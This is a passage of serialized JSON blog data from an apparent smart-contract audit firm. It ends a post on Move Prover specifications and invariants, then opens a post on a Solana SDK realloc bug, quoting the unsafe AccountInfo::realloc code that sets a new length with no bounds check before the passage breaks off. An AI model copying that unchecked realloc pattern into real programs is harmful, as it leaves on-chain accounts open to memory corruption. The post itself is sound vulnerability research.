tyle":6947},[16702],{"type":31,"value":16703}," multiplier",{"type":25,"tag":216,"props":16705,"children":16706},{"style":6953},[16707],{"type":31,"value":179},{"type":25,"tag":216,"props":16709,"children":16710},{"style":6964},[16711],{"type":31,"value":16712},"value) ",{"type":25,"tag":216,"props":16714,"children":16715},{"style":6953},[16716],{"type":31,"value":16717},">>",{"type":25,"tag":216,"props":16719,"children":16720},{"style":6989},[16721],{"type":31,"value":16722}," 32\n",{"type":25,"tag":216,"props":16724,"children":16725},{"class":6922,"line":7257},[16726],{"type":25,"tag":216,"props":16727,"children":16728},{"style":6964},[16729],{"type":31,"value":16620},{"type":25,"tag":606,"props":16731,"children":16733},{"id":16732},"access-control-policies",[16734],{"type":31,"value":16735},"Access Control Policies",{"type":25,"tag":38,"props":16737,"children":16738},{},[16739],{"type":31,"value":16740},"Somewhat similar to error conditions, it's often useful to enforce explicit access control policies at the specification level.",{"type":25,"tag":38,"props":16742,"children":16743},{},[16744,16746,16752,16754,16759],{"type":31,"value":16745},"For example, in ",{"type":25,"tag":82,"props":16747,"children":16749},{"className":16748},[],[16750],{"type":31,"value":16751},"std::offer",{"type":31,"value":16753}," we are able to see that the function should abort if and only if there does not exist an offer, ",{"type":25,"tag":64,"props":16755,"children":16756},{},[16757],{"type":31,"value":16758},"or",{"type":31,"value":16760}," the recipient is now allowed.",{"type":25,"tag":206,"props":16762,"children":16764},{"code":16763,"language":6914,"meta":7,"className":6915,"style":7},"    spec redeem {\n      /// Aborts if there is no offer under `offer_address` or if the account\n      /// cannot redeem the offer.\n      /// Ensures that the offered struct under `offer_address` is removed.\n      aborts_if !exists\u003COffer\u003COffered>>(offer_address);\n      aborts_if !is_allowed_recipient\u003COffered>(offer_address, signer::address_of(account));\n      ensures !exists\u003COffer\u003COffered>>(offer_address);\n      ensures result == old(global\u003COffer\u003COffered>>(offer_address).offered);\n    }\n",[16765],{"type":25,"tag":82,"props":16766,"children":16767},{"__ignoreMap":7},[16768,16785,16793,16801,16809,16856,16914,16957,17023],{"type":25,"tag":216,"props":16769,"children":16770},{"class":6922,"line":6923},[16771,16776,16781],{"type":25,"tag":216,"props":16772,"children":16773},{"style":6947},[16774],{"type":31,"value":16775},"    spec",{"type":25,"tag":216,"props":16777,"children":16778},{"style":6947},[16779],{"type":31,"value":16780}," redeem",{"type":25,"tag":216,"props":16782,"children":16783},{"style":6964},[16784],{"type":31,"value":7241},{"type":25,"tag":216,"props":16786,"children":16787},{"class":6922,"line":6769},[16788],{"type":25,"tag":216,"props":16789,"children":16790},{"style":6927},[16791],{"type":31,"value":16792},"      /// Aborts if there is no offer under `offer_address` or if the account\n",{"type":25,"tag":216,"props":16794,"children":16795},{"class":6922,"line":6778},[16796],{"type":25,"tag":216,"props":16797,"children":16798},{"style":6927},[16799],{"type":31,"value":16800},"      /// cannot redeem the offer.\n",{"type":25,"tag":216,"props":16802,"children":16803},{"class":6922,"line":7005},[16804],{"type":25,"tag":216,"props":16805,"children":16806},{"style":6927},[16807],{"type":31,"value":16808},"      /// Ensures that the offered struct under `offer_address` is removed.\n",{"type":25,"tag":216,"props":16810,"children":16811},{"class":6922,"line":7110},[16812,16816,16821,16825,16829,16834,16838,16843,16847,16852],{"type":25,"tag":216,"props":16813,"children":16814},{"style":6947},[16815],{"type":31,"value":13007},{"type":25,"tag":216,"props":16817,"children":16818},{"style":6953},[16819],{"type":31,"value":16820}," !",{"type":25,"tag":216,"props":16822,"children":16823},{"style":6947},[16824],{"type":31,"value":10656},{"type":25,"tag":216,"props":16826,"children":16827},{"style":6964},[16828],{"type":31,"value":9757},{"type":25,"tag":216,"props":16830,"children":16831},{"style":7375},[16832],{"type":31,"value":16833},"Offer",{"type":25,"tag":216,"props":16835,"children":16836},{"style":6964},[16837],{"type":31,"value":9757},{"type":25,"tag":216,"props":16839,"children":16840},{"style":7375},[16841],{"type":31,"value":16842},"Offered",{"type":25,"tag":216,"props":16844,"children":16845},{"style":6964},[16846],{"type":31,"value":10678},{"type":25,"tag":216,"props":16848,"children":16849},{"style":6947},[16850],{"type":31,"value":16851},"offer_address",{"type":25,"tag":216,"props":16853,"children":16854},{"style":6964},[16855],{"type":31,"value":7797},{"type":25,"tag":216,"props":16857,"children":16858},{"class":6922,"line":7216},[16859,16863,16867,16872,16876,16880,16884,16888,16893,16897,16901,16905,16910],{"type":25,"tag":216,"props":16860,"children":16861},{"style":6947},[16862],{"type":31,"value":13007},{"type":25,"tag":216,"props":16864,"children":16865},{"style":6953},[16866],{"type":31,"value":16820},{"type":25,"tag":216,"props":16868,"children":16869},{"style":6947},[16870],{"type":31,"value":16871},"is_allowed_recipient",{"type":25,"tag":216,"props":16873,"children":16874},{"style":6964},[16875],{"type":31,"value":9757},{"type":25,"tag":216,"props":16877,"children":16878},{"style":7375},[16879],{"type":31,"value":16842},{"type":25,"tag":216,"props":16881,"children":16882},{"style":6964},[16883],{"type":31,"value":11562},{"type":25,"tag":216,"props":16885,"children":16886},{"style":6947},[16887],{"type":31,"value":16851},{"type":25,"tag":216,"props":16889,"children":16890},{"style":6964},[16891],{"type":31,"value":16892},", signer",{"type":25,"tag":216,"props":16894,"children":16895},{"style":6953},[16896],{"type":31,"value":7438},{"type":25,"tag":216,"props":16898,"children":16899},{"style":7047},[16900],{"type":31,"value":11161},{"type":25,"tag":216,"props":16902,"children":16903},{"style":6964},[16904],{"type":31,"value":1850},{"type":25,"tag":216,"props":16906,"children":16907},{"style":6947},[16908],{"type":31,"value":16909},"account",{"type":25,"tag":216,"props":16911,"children":16912},{"style":6964},[16913],{"type":31,"value":11175},{"type":25,"tag":216,"props":16915,"children":16916},{"class":6922,"line":7244},[16917,16921,16925,16929,16933,16937,16941,16945,16949,16953],{"type":25,"tag":216,"props":16918,"children":16919},{"style":6947},[16920],{"type":31,"value":12139},{"type":25,"tag":216,"props":16922,"children":16923},{"style":6953},[16924],{"type":31,"value":16820},{"type":25,"tag":216,"props":16926,"children":16927},{"style":6947},[16928],{"type":31,"value":10656},{"type":25,"tag":216,"props":16930,"children":16931},{"style":6964},[16932],{"type":31,"value":9757},{"type":25,"tag":216,"props":16934,"children":16935},{"style":7375},[16936],{"type":31,"value":16833},{"type":25,"tag":216,"props":16938,"children":16939},{"style":6964},[16940],{"type":31,"value":9757},{"type":25,"tag":216,"props":16942,"children":16943},{"style":7375},[16944],{"type":31,"value":16842},{"type":25,"tag":216,"props":16946,"children":16947},{"style":6964},[16948],{"type":31,"value":10678},{"type":25,"tag":216,"props":16950,"children":16951},{"style":6947},[16952],{"type":31,"value":16851},{"type":25,"tag":216,"props":16954,"children":16955},{"style":6964},[16956],{"type":31,"value":7797},{"type":25,"tag":216,"props":16958,"children":16959},{"class":6922,"line":7257},[16960,16964,16968,16972,16977,16981,16986,16990,16994,16998,17002,17006,17010,17014,17018],{"type":25,"tag":216,"props":16961,"children":16962},{"style":6947},[16963],{"type":31,"value":12139},{"type":25,"tag":216,"props":16965,"children":16966},{"style":6947},[16967],{"type":31,"value":13115},{"type":25,"tag":216,"props":16969,"children":16970},{"style":6953},[16971],{"type":31,"value":7232},{"type":25,"tag":216,"props":16973,"children":16974},{"style":7047},[16975],{"type":31,"value":16976}," old",{"type":25,"tag":216,"props":16978,"children":16979},{"style":6964},[16980],{"type":31,"value":1850},{"type":25,"tag":216,"props":16982,"children":16983},{"style":6947},[16984],{"type":31,"value":16985},"global",{"type":25,"tag":216,"props":16987,"children":16988},{"style":6964},[16989],{"type":31,"value":9757},{"type":25,"tag":216,"props":16991,"children":16992},{"style":7375},[16993],{"type":31,"value":16833},{"type":25,"tag":216,"props":16995,"children":16996},{"style":6964},[16997],{"type":31,"value":9757},{"type":25,"tag":216,"props":16999,"children":17000},{"style":7375},[17001],{"type":31,"value":16842},{"type":25,"tag":216,"props":17003,"children":17004},{"style":6964},[17005],{"type":31,"value":10678},{"type":25,"tag":216,"props":17007,"children":17008},{"style":6947},[17009],{"type":31,"value":16851},{"type":25,"tag":216,"props":17011,"children":17012},{"style":6964},[17013],{"type":31,"value":1888},{"type":25,"tag":216,"props":17015,"children":17016},{"style":6953},[17017],{"type":31,"value":179},{"type":25,"tag":216,"props":17019,"children":17020},{"style":6964},[17021],{"type":31,"value":17022},"offered);\n",{"type":25,"tag":216,"props":17024,"children":17025},{"class":6922,"line":7275},[17026],{"type":25,"tag":216,"props":17027,"children":17028},{"style":6964},[17029],{"type":31,"value":7311},{"type":25,"tag":38,"props":17031,"children":17032},{},[17033],{"type":31,"value":17034},"These access control specifications make it impossible to accidentally remove security critical access control policies later.",{"type":25,"tag":606,"props":17036,"children":17038},{"id":17037},"complex-mathematical-formulae",[17039],{"type":31,"value":17040},"Complex Mathematical Formulae",{"type":25,"tag":38,"props":17042,"children":17043},{},[17044,17046,17051],{"type":31,"value":17045},"Whether it's a decimal implementation or more complex data structures, it's often useful to verify that the expected output is ",{"type":25,"tag":64,"props":17047,"children":17048},{},[17049],{"type":31,"value":17050},"always",{"type":31,"value":17052}," the output.",{"type":25,"tag":38,"props":17054,"children":17055},{},[17056],{"type":31,"value":17057},"Proving that your fundamental data structures work exactly as intended will give you much more confidence in the remainder of your codebase.",{"type":25,"tag":38,"props":17059,"children":17060},{},[17061,17063,17070],{"type":31,"value":17062},"For example, in our work with ",{"type":25,"tag":162,"props":17064,"children":17067},{"href":17065,"rel":17066},"https://laminar.markets/",[166],[17068],{"type":31,"value":17069},"Laminar Markets",{"type":31,"value":17071},", we provided recommendations for verifying their internal splay tree implementation against a simpler priority queue data structure.",{"type":25,"tag":606,"props":17073,"children":17075},{"id":17074},"data-invariants",[17076],{"type":31,"value":17077},"Data Invariants",{"type":25,"tag":38,"props":17079,"children":17080},{},[17081,17083,17089,17091,17097,17099,17105,17107,17113],{"type":31,"value":17082},"Formal verification provides the best environment to verify that certain ",{"type":25,"tag":82,"props":17084,"children":17086},{"className":17085},[],[17087],{"type":31,"value":17088},"variables",{"type":31,"value":17090}," or ",{"type":25,"tag":82,"props":17092,"children":17094},{"className":17093},[],[17095],{"type":31,"value":17096},"resources",{"type":31,"value":17098}," don't exceed the intended boundaries. Let's consider the struct from below. We can ensure that ",{"type":25,"tag":82,"props":17100,"children":17102},{"className":17101},[],[17103],{"type":31,"value":17104},"index",{"type":31,"value":17106}," is never greater than 4 using a ",{"type":25,"tag":82,"props":17108,"children":17110},{"className":17109},[],[17111],{"type":31,"value":17112},"struct invariant",{"type":31,"value":179},{"type":25,"tag":206,"props":17115,"children":17117},{"code":17116,"language":6914,"meta":7,"className":6915,"style":7},"struct Type {\n    index: u64\n}\n\nspec Type {\n    invariant index \u003C 4;\n}\n",[17118],{"type":25,"tag":82,"props":17119,"children":17120},{"__ignoreMap":7},[17121,17137,17154,17161,17168,17183,17207],{"type":25,"tag":216,"props":17122,"children":17123},{"class":6922,"line":6923},[17124,17128,17133],{"type":25,"tag":216,"props":17125,"children":17126},{"style":6936},[17127],{"type":31,"value":13357},{"type":25,"tag":216,"props":17129,"children":17130},{"style":7375},[17131],{"type":31,"value":17132}," Type",{"type":25,"tag":216,"props":17134,"children":17135},{"style":6964},[17136],{"type":31,"value":7241},{"type":25,"tag":216,"props":17138,"children":17139},{"class":6922,"line":6769},[17140,17145,17149],{"type":25,"tag":216,"props":17141,"children":17142},{"style":6947},[17143],{"type":31,"value":17144},"    index",{"type":25,"tag":216,"props":17146,"children":17147},{"style":6953},[17148],{"type":31,"value":1472},{"type":25,"tag":216,"props":17150,"children":17151},{"style":7375},[17152],{"type":31,"value":17153}," u64\n",{"type":25,"tag":216,"props":17155,"children":17156},{"class":6922,"line":6778},[17157],{"type":25,"tag":216,"props":17158,"children":17159},{"style":6964},[17160],{"type":31,"value":7874},{"type":25,"tag":216,"props":17162,"children":17163},{"class":6922,"line":7005},[17164],{"type":25,"tag":216,"props":17165,"children":17166},{"emptyLinePlaceholder":16},[17167],{"type":31,"value":7642},{"type":25,"tag":216,"props":17169,"children":17170},{"class":6922,"line":7110},[17171,17175,17179],{"type":25,"tag":216,"props":17172,"children":17173},{"style":6947},[17174],{"type":31,"value":12227},{"type":25,"tag":216,"props":17176,"children":17177},{"style":7375},[17178],{"type":31,"value":17132},{"type":25,"tag":216,"props":17180,"children":17181},{"style":6964},[17182],{"type":31,"value":7241},{"type":25,"tag":216,"props":17184,"children":17185},{"class":6922,"line":7216},[17186,17190,17195,17199,17203],{"type":25,"tag":216,"props":17187,"children":17188},{"style":6947},[17189],{"type":31,"value":12244},{"type":25,"tag":216,"props":17191,"children":17192},{"style":6947},[17193],{"type":31,"value":17194}," index",{"type":25,"tag":216,"props":17196,"children":17197},{"style":6953},[17198],{"type":31,"value":12672},{"type":25,"tag":216,"props":17200,"children":17201},{"style":6989},[17202],{"type":31,"value":15701},{"type":25,"tag":216,"props":17204,"children":17205},{"style":6964},[17206],{"type":31,"value":6967},{"type":25,"tag":216,"props":17208,"children":17209},{"class":6922,"line":7244},[17210],{"type":25,"tag":216,"props":17211,"children":17212},{"style":6964},[17213],{"type":31,"value":7874},{"type":25,"tag":38,"props":17215,"children":17216},{},[17217,17219,17226,17227,17233],{"type":31,"value":17218},"We were able to verify more complex properties in our recent audits for ",{"type":25,"tag":162,"props":17220,"children":17223},{"href":17221,"rel":17222},"https://layerzero.network/",[166],[17224],{"type":31,"value":17225},"LayerZero",{"type":31,"value":1307},{"type":25,"tag":162,"props":17228,"children":17231},{"href":17229,"rel":17230},"http://ariesmarkets.xyz/",[166],[17232],{"type":31,"value":10742},{"type":31,"value":17234},", but the details are left as an exercise to the reader.",{"type":25,"tag":606,"props":17236,"children":17238},{"id":17237},"economic-invariants",[17239],{"type":31,"value":17240},"Economic Invariants.",{"type":25,"tag":38,"props":17242,"children":17243},{},[17244],{"type":31,"value":17245},"Proper economic invariants can require more creativity to come up with but can be extremely effective at securing your protocol.",{"type":25,"tag":38,"props":17247,"children":17248},{},[17249],{"type":31,"value":17250},"For example, you should never be able to drain coins from a pool by adding and removing shares. In practice, you might implement this as a utility helper function.",{"type":25,"tag":206,"props":17252,"children":17253},{"code":11919,"language":6914,"meta":7,"className":6915,"style":7},[17254],{"type":25,"tag":82,"props":17255,"children":17256},{"__ignoreMap":7},[17257,17264,17347,17386,17405,17412,17427,17450,17473,17496],{"type":25,"tag":216,"props":17258,"children":17259},{"class":6922,"line":6923},[17260],{"type":25,"tag":216,"props":17261,"children":17262},{"style":6927},[17263],{"type":31,"value":11931},{"type":25,"tag":216,"props":17265,"children":17266},{"class":6922,"line":6769},[17267,17271,17275,17279,17283,17287,17291,17295,17299,17303,17307,17311,17315,17319,17323,17327,17331,17335,17339,17343],{"type":25,"tag":216,"props":17268,"children":17269},{"style":6947},[17270],{"type":31,"value":10521},{"type":25,"tag":216,"props":17272,"children":17273},{"style":7047},[17274],{"type":31,"value":11943},{"type":25,"tag":216,"props":17276,"children":17277},{"style":6964},[17278],{"type":31,"value":1850},{"type":25,"tag":216,"props":17280,"children":17281},{"style":6947},[17282],{"type":31,"value":11952},{"type":25,"tag":216,"props":17284,"children":17285},{"style":6953},[17286],{"type":31,"value":1472},{"type":25,"tag":216,"props":17288,"children":17289},{"style":7375},[17290],{"type":31,"value":9811},{"type":25,"tag":216,"props":17292,"children":17293},{"style":6964},[17294],{"type":31,"value":7026},{"type":25,"tag":216,"props":17296,"children":17297},{"style":6947},[17298],{"type":31,"value":11969},{"type":25,"tag":216,"props":17300,"children":17301},{"style":6953},[17302],{"type":31,"value":1472},{"type":25,"tag":216,"props":17304,"children":17305},{"style":7375},[17306],{"type":31,"value":9811},{"type":25,"tag":216,"props":17308,"children":17309},{"style":6964},[17310],{"type":31,"value":1888},{"type":25,"tag":216,"props":17312,"children":17313},{"style":6953},[17314],{"type":31,"value":1472},{"type":25,"tag":216,"props":17316,"children":17317},{"style":6964},[17318],{"type":31,"value":7016},{"type":25,"tag":216,"props":17320,"children":17321},{"style":7375},[17322],{"type":31,"value":11994},{"type":25,"tag":216,"props":17324,"children":17325},{"style":6964},[17326],{"type":31,"value":7026},{"type":25,"tag":216,"props":17328,"children":17329},{"style":7375},[17330],{"type":31,"value":11994},{"type":25,"tag":216,"props":17332,"children":17333},{"style":6964},[17334],{"type":31,"value":7036},{"type":25,"tag":216,"props":17336,"children":17337},{"style":6947},[17338],{"type":31,"value":10295},{"type":25,"tag":216,"props":17340,"children":17341},{"style":7375},[17342],{"type":31,"value":12015},{"type":25,"tag":216,"props":17344,"children":17345},{"style":6964},[17346],{"type":31,"value":7241},{"type":25,"tag":216,"props":17348,"children":17349},{"class":6922,"line":6778},[17350,17354,17358,17362,17366,17370,17374,17378,17382],{"type":25,"tag":216,"props":17351,"children":17352},{"style":6936},[17353],{"type":31,"value":12027},{"type":25,"tag":216,"props":17355,"children":17356},{"style":6947},[17357],{"type":31,"value":12032},{"type":25,"tag":216,"props":17359,"children":17360},{"style":6953},[17361],{"type":31,"value":6956},{"type":25,"tag":216,"props":17363,"children":17364},{"style":7047},[17365],{"type":31,"value":12041},{"type":25,"tag":216,"props":17367,"children":17368},{"style":6964},[17369],{"type":31,"value":1850},{"type":25,"tag":216,"props":17371,"children":17372},{"style":6947},[17373],{"type":31,"value":11952},{"type":25,"tag":216,"props":17375,"children":17376},{"style":6964},[17377],{"type":31,"value":7026},{"type":25,"tag":216,"props":17379,"children":17380},{"style":6947},[17381],{"type":31,"value":11969},{"type":25,"tag":216,"props":17383,"children":17384},{"style":6964},[17385],{"type":31,"value":7797},{"type":25,"tag":216,"props":17387,"children":17388},{"class":6922,"line":7005},[17389,17393,17397,17401],{"type":25,"tag":216,"props":17390,"children":17391},{"style":7047},[17392],{"type":31,"value":12069},{"type":25,"tag":216,"props":17394,"children":17395},{"style":6964},[17396],{"type":31,"value":1850},{"type":25,"tag":216,"props":17398,"children":17399},{"style":6947},[17400],{"type":31,"value":12078},{"type":25,"tag":216,"props":17402,"children":17403},{"style":6964},[17404],{"type":31,"value":7107},{"type":25,"tag":216,"props":17406,"children":17407},{"class":6922,"line":7110},[17408],{"type":25,"tag":216,"props":17409,"children":17410},{"style":6964},[17411],{"type":31,"value":9823},{"type":25,"tag":216,"props":17413,"children":17414},{"class":6922,"line":7216},[17415,17419,17423],{"type":25,"tag":216,"props":17416,"children":17417},{"style":6947},[17418],{"type":31,"value":12097},{"type":25,"tag":216,"props":17420,"children":17421},{"style":6947},[17422],{"type":31,"value":11943},{"type":25,"tag":216,"props":17424,"children":17425},{"style":6964},[17426],{"type":31,"value":7241},{"type":25,"tag":216,"props":17428,"children":17429},{"class":6922,"line":7244},[17430,17434,17438,17442,17446],{"type":25,"tag":216,"props":17431,"children":17432},{"style":6947},[17433],{"type":31,"value":12113},{"type":25,"tag":216,"props":17435,"children":17436},{"style":6947},[17437],{"type":31,"value":12118},{"type":25,"tag":216,"props":17439,"children":17440},{"style":6953},[17441],{"type":31,"value":266},{"type":25,"tag":216,"props":17443,"children":17444},{"style":6936},[17445],{"type":31,"value":12127},{"type":25,"tag":216,"props":17447,"children":17448},{"style":6964},[17449],{"type":31,"value":6967},{"type":25,"tag":216,"props":17451,"children":17452},{"class":6922,"line":7257},[17453,17457,17461,17465,17469],{"type":25,"tag":216,"props":17454,"children":17455},{"style":6947},[17456],{"type":31,"value":12139},{"type":25,"tag":216,"props":17458,"children":17459},{"style":6947},[17460],{"type":31,"value":12144},{"type":25,"tag":216,"props":17462,"children":17463},{"style":6953},[17464],{"type":31,"value":12149},{"type":25,"tag":216,"props":17466,"children":17467},{"style":6947},[17468],{"type":31,"value":12154},{"type":25,"tag":216,"props":17470,"children":17471},{"style":6964},[17472],{"type":31,"value":6967},{"type":25,"tag":216,"props":17474,"children":17475},{"class":6922,"line":7275},[17476,17480,17484,17488,17492],{"type":25,"tag":216,"props":17477,"children":17478},{"style":6947},[17479],{"type":31,"value":12139},{"type":25,"tag":216,"props":17481,"children":17482},{"style":6947},[17483],{"type":31,"value":12170},{"type":25,"tag":216,"props":17485,"children":17486},{"style":6953},[17487],{"type":31,"value":12149},{"type":25,"tag":216,"props":17489,"children":17490},{"style":6947},[17491],{"type":31,"value":12179},{"type":25,"tag":216,"props":17493,"children":17494},{"style":6964},[17495],{"type":31,"value":6967},{"type":25,"tag":216,"props":17497,"children":17498},{"class":6922,"line":7296},[17499],{"type":25,"tag":216,"props":17500,"children":17501},{"style":6964},[17502],{"type":31,"value":9823},{"type":25,"tag":38,"props":17504,"children":17505},{},[17506],{"type":31,"value":17507},"Some other ideas include",{"type":25,"tag":6711,"props":17509,"children":17510},{},[17511,17516,17521],{"type":25,"tag":2043,"props":17512,"children":17513},{},[17514],{"type":31,"value":17515},"Swapping through an AMM should never lead to a decrease in one side of the pool without also increasing the other side. In other words, no free money",{"type":25,"tag":2043,"props":17517,"children":17518},{},[17519],{"type":31,"value":17520},"Lending protocols should always be fully collateralized after a series of deposit, borrow, and withdraw instructions.",{"type":25,"tag":2043,"props":17522,"children":17523},{},[17524],{"type":31,"value":17525},"Orderbooks should never lose money after an order is placed and then canceled.",{"type":25,"tag":26,"props":17527,"children":17528},{"id":9258},[17529],{"type":31,"value":9261},{"type":25,"tag":38,"props":17531,"children":17532},{},[17533],{"type":31,"value":17534},"In this post, we've explored how to properly utilize the Move Prover to verify critical invariants about your codebase.",{"type":25,"tag":38,"props":17536,"children":17537},{},[17538],{"type":31,"value":17539},"In our upcoming posts, we will explore how to turn the Move Prover into a weapon for squashing security vulnerabilities by learning how to ask the right questions, so stay tuned!",{"type":25,"tag":38,"props":17541,"children":17542},{},[17543,17545,17550],{"type":31,"value":17544},"We're passionate about formal verification and pushing the edge of what's possible in Move security. If you have any thoughts, or would like to explore an audit, feel free to reach out to me ",{"type":25,"tag":162,"props":17546,"children":17548},{"href":13197,"rel":17547},[166],[17549],{"type":31,"value":13201},{"type":31,"value":179},{"type":25,"tag":9316,"props":17552,"children":17553},{},[17554],{"type":31,"value":9320},{"title":7,"searchDepth":6769,"depth":6769,"links":17556},[17557,17558,17561,17568],{"id":13261,"depth":6769,"text":13264},{"id":13315,"depth":6769,"text":13318,"children":17559},[17560],{"id":13566,"depth":6778,"text":13562},{"id":16465,"depth":6769,"text":16468,"children":17562},[17563,17564,17565,17566,17567],{"id":16481,"depth":6778,"text":16484},{"id":16732,"depth":6778,"text":16735},{"id":17037,"depth":6778,"text":17040},{"id":17074,"depth":6778,"text":17077},{"id":17237,"depth":6778,"text":17240},{"id":9258,"depth":6769,"text":9261},"content:blog:2022-09-16-move-prover.md","blog/2022-09-16-move-prover.md","blog/2022-09-16-move-prover",{"_path":17573,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":17574,"description":17575,"author":17576,"image":17577,"date":17581,"isFeatured":16,"onBlogPage":16,"tags":17582,"body":17583,"_type":6798,"_id":22702,"_source":6800,"_file":22703,"_stem":22704,"_extension":6803},"/blog/2022-12-09-rust-realloc-and-references","Rust, Realloc, and References","Rust is safe.. right? Not if your dependencies are unsafe.. A deep dive into a subtle Solana SDK bug, Rust internals, and how we found it all.","ethan",{"src":17578,"height":17579,"width":17580},"/posts/rust-realloc-and-references/title.jpg",512,1024,"2022-12-09",[6816,13225],{"type":22,"children":17584,"toc":22686},[17585,17613,17633,18303,18323,18334,18346,18479,18489,18495,18521,18862,18907,19233,19296,19309,19383,19451,19472,19485,19499,19848,19859,19864,19995,20046,20072,20084,20257,20393,20434,20471,20537,20542,20579,20633,20644,20787,20799,20805,20811,20844,20858,20980,20999,21027,21033,21123,21213,21219,21224,21271,21540,21615,21626,21653,21985,21997,22070,22343,22380,22682],{"type":25,"tag":38,"props":17586,"children":17587},{},[17588,17590,17596,17598,17603,17605,17611],{"type":31,"value":17589},"It all started with an audit of a program that used ",{"type":25,"tag":82,"props":17591,"children":17593},{"className":17592},[],[17594],{"type":31,"value":17595},"realloc",{"type":31,"value":17597}," on an account, without any bounds checks on the new size allowed. It seemed like the developers assumed that if the new size was too large, the ",{"type":25,"tag":82,"props":17599,"children":17601},{"className":17600},[],[17602],{"type":31,"value":17595},{"type":31,"value":17604}," call (from ",{"type":25,"tag":82,"props":17606,"children":17608},{"className":17607},[],[17609],{"type":31,"value":17610},"solana_program",{"type":31,"value":17612},") would error out appropriately.",{"type":25,"tag":38,"props":17614,"children":17615},{},[17616,17618,17624,17625,17632],{"type":31,"value":17617},"But we're not ones to just assume things around here, so let's take a look at how ",{"type":25,"tag":82,"props":17619,"children":17621},{"className":17620},[],[17622],{"type":31,"value":17623},"AccountInfo::realloc",{"type":31,"value":1680},{"type":25,"tag":162,"props":17626,"children":17629},{"href":17627,"rel":17628},"https://docs.rs/solana-program/1.10.28/src/solana_program/account_info.rs.html#124-148",[166],[17630],{"type":31,"value":17631},"implemented",{"type":31,"value":1472},{"type":25,"tag":206,"props":17634,"children":17636},{"className":6915,"code":17635,"language":6914,"meta":7,"style":7},"pub fn realloc(&self, new_len: usize, zero_init: bool) -> Result\u003C(), ProgramError> {\n    let orig_len = self.data_len();\n\n    // realloc\n    unsafe {\n        // First set new length in the serialized data\n        let ptr = self.try_borrow_mut_data()?.as_mut_ptr().offset(-8) as *mut u64;\n        *ptr = new_len as u64;\n\n        // Then set the new length in the local slice\n        let ptr = &mut *(((self.data.as_ptr() as *const u64).offset(1) as u64) as *mut u64);\n        *ptr = new_len as u64;\n    }\n\n    // zero-init if requested\n    if zero_init && new_len > orig_len {\n        sol_memset(\n            &mut self.try_borrow_mut_data()?[orig_len..],\n            0,\n            new_len.saturating_sub(orig_len),\n        );\n    }\n\n    Ok(())\n}\n",[17637],{"type":25,"tag":82,"props":17638,"children":17639},{"__ignoreMap":7},[17640,17734,17768,17775,17783,17795,17803,17895,17928,17935,17943,18073,18104,18111,18118,18126,18160,18172,18221,18233,18262,18269,18276,18283,18296],{"type":25,"tag":216,"props":17641,"children":17642},{"class":6922,"line":6923},[17643,17648,17653,17658,17662,17666,17671,17675,17680,17684,17689,17693,17698,17702,17706,17710,17715,17720,17725,17730],{"type":25,"tag":216,"props":17644,"children":17645},{"style":6936},[17646],{"type":31,"value":17647},"pub",{"type":25,"tag":216,"props":17649,"children":17650},{"style":6936},[17651],{"type":31,"value":17652}," fn",{"type":25,"tag":216,"props":17654,"children":17655},{"style":7047},[17656],{"type":31,"value":17657}," realloc",{"type":25,"tag":216,"props":17659,"children":17660},{"style":6964},[17661],{"type":31,"value":1850},{"type":25,"tag":216,"props":17663,"children":17664},{"style":6953},[17665],{"type":31,"value":7059},{"type":25,"tag":216,"props":17667,"children":17668},{"style":6936},[17669],{"type":31,"value":17670},"self",{"type":25,"tag":216,"props":17672,"children":17673},{"style":6964},[17674],{"type":31,"value":7026},{"type":25,"tag":216,"props":17676,"children":17677},{"style":6947},[17678],{"type":31,"value":17679},"new_len",{"type":25,"tag":216,"props":17681,"children":17682},{"style":6953},[17683],{"type":31,"value":1472},{"type":25,"tag":216,"props":17685,"children":17686},{"style":7375},[17687],{"type":31,"value":17688}," usize",{"type":25,"tag":216,"props":17690,"children":17691},{"style":6964},[17692],{"type":31,"value":7026},{"type":25,"tag":216,"props":17694,"children":17695},{"style":6947},[17696],{"type":31,"value":17697},"zero_init",{"type":25,"tag":216,"props":17699,"children":17700},{"style":6953},[17701],{"type":31,"value":1472},{"type":25,"tag":216,"props":17703,"children":17704},{"style":7375},[17705],{"type":31,"value":16006},{"type":25,"tag":216,"props":17707,"children":17708},{"style":6964},[17709],{"type":31,"value":7036},{"type":25,"tag":216,"props":17711,"children":17712},{"style":6953},[17713],{"type":31,"value":17714},"->",{"type":25,"tag":216,"props":17716,"children":17717},{"style":7375},[17718],{"type":31,"value":17719}," Result",{"type":25,"tag":216,"props":17721,"children":17722},{"style":6964},[17723],{"type":31,"value":17724},"\u003C(), ",{"type":25,"tag":216,"props":17726,"children":17727},{"style":7375},[17728],{"type":31,"value":17729},"ProgramError",{"type":25,"tag":216,"props":17731,"children":17732},{"style":6964},[17733],{"type":31,"value":11233},{"type":25,"tag":216,"props":17735,"children":17736},{"class":6922,"line":6769},[17737,17741,17746,17750,17755,17759,17764],{"type":25,"tag":216,"props":17738,"children":17739},{"style":6936},[17740],{"type":31,"value":6939},{"type":25,"tag":216,"props":17742,"children":17743},{"style":6947},[17744],{"type":31,"value":17745}," orig_len",{"type":25,"tag":216,"props":17747,"children":17748},{"style":6953},[17749],{"type":31,"value":6956},{"type":25,"tag":216,"props":17751,"children":17752},{"style":6936},[17753],{"type":31,"value":17754}," self",{"type":25,"tag":216,"props":17756,"children":17757},{"style":6953},[17758],{"type":31,"value":179},{"type":25,"tag":216,"props":17760,"children":17761},{"style":7047},[17762],{"type":31,"value":17763},"data_len",{"type":25,"tag":216,"props":17765,"children":17766},{"style":6964},[17767],{"type":31,"value":7633},{"type":25,"tag":216,"props":17769,"children":17770},{"class":6922,"line":6778},[17771],{"type":25,"tag":216,"props":17772,"children":17773},{"emptyLinePlaceholder":16},[17774],{"type":31,"value":7642},{"type":25,"tag":216,"props":17776,"children":17777},{"class":6922,"line":7005},[17778],{"type":25,"tag":216,"props":17779,"children":17780},{"style":6927},[17781],{"type":31,"value":17782},"    // realloc\n",{"type":25,"tag":216,"props":17784,"children":17785},{"class":6922,"line":7110},[17786,17791],{"type":25,"tag":216,"props":17787,"children":17788},{"style":6936},[17789],{"type":31,"value":17790},"    unsafe",{"type":25,"tag":216,"props":17792,"children":17793},{"style":6964},[17794],{"type":31,"value":7241},{"type":25,"tag":216,"props":17796,"children":17797},{"class":6922,"line":7216},[17798],{"type":25,"tag":216,"props":17799,"children":17800},{"style":6927},[17801],{"type":31,"value":17802},"        // First set new length in the serialized 